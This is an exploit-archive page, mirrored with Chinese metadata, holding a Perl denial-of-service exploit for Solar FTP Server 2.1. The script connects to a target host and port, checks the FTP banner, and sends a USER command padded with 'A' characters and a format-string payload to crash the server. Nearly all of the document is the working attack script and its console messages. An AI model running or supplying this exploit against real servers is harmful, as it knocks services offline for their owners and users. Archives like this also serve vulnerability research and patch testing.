Solar FTP Server 2.1 – Denial of Service

  • 作者: x000
    日期: 2011-02-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16204/
  • #!/usr/bin/perl
    #
    #[+]Exploit Titulo: Exploit Denial of Service Solar FTP 2.1
    #[+]Data: 21/10/2011
    #[+]Autor: x000
    #[+]Versão: 2.1
    #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN 
    #[+]CVE: N/A
    #
    # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    # xxx xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    #xxxxxxxx xxxxxx xxxxxx xxx xxxxxx 
    # xxx xxx xxxxxx xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx
    # xxxxxxxxx xxxxxx xxxxxx xxxxxxxxxxxxx
    #xxxxxx xxx xxxxxx xxxxxx xxxxxxxxx xxxx xxxxxxx
    #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx xx xx xx
    # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxx xxxxxxxxxxxxx
    #
    #
    #
    # Link de Download: http://solarftp.com/files/solarftps-setup.exe
    #
    # .: Criadorby: x000 :.
    #3d3n@hotmail.com.br
    # www.x000.org
    # Obrigado C4SS!0 G0M3S Friends Forever
    #
    
    
    use Socket;
    use IO::Socket;
    use strict;
    use warnings;
    
    my $sys = `ver`;
    
    if($sys=~/Windows/){
    system("cls");
    system("color 4f");
    }
    else{
    system("clear");
    }
    sub usage{
    print q
    {
     0000000000000000000000
    0000000000000000000000000000
     0000 000000
    0000000000
     0000 000000000000000000000000
    0000 000000000000000000
     
    | Criador x000 |
    
     | Contato: 3d3n@hotmail.com.br |
    
    |From Brazil |
    
    | Site www.x000.org |
    
    
    };
    }
    
    if($#ARGV!=1){
    usage;
    print "\t\t[-]Modo de Uso: perl $0 <Host> <Porta>\n";
    print "\t\t[-]Exemplo:perl $0 192.168.1.12 21\n";
    exit;
    }
    
    usage;
    print "\t\t[+]Conectando ao Servidor $ARGV[0]...\n\n";
    sleep(1);
    
    my $exploit = "A" x 50;
    $exploit = $exploit."%x%lf%f%d%c%s%c%u%n%s%c%lf%tt%d%c";
    
    
    my $sock = IO::Socket::INET->new(
    PeerAddr=>$ARGV[0],
    PeerPort=>int($ARGV[1]),
    Timeout=>1,
    Proto=>"tcp",
    )or die("ERRO:\n$!\n");
    
    print "\t\t[+]Checando se o Servidor e Vulneravel\n\n";
    sleep(1);
    
    
    $sock->recv(my $data,2000);
    unless($data=~/Solar FTP Server/){
    print "\t\t[+]Servidor Nao e Vulneravel:(\n\n";
    sleep(1);
    exit;
    }
    print "\t\t[+]Servidor Vulneravel:)\n\n";
    sleep(1);
    
    print "\t\t[+]Enviando Exploit Denial of Service\n\n";
    sleep(1);
    $sock->send("USER $exploit\r\n");
    close($sock);
    print "\t\t[+]Exploit Denial Of Service Enviado:)\n";
    
    # x000.org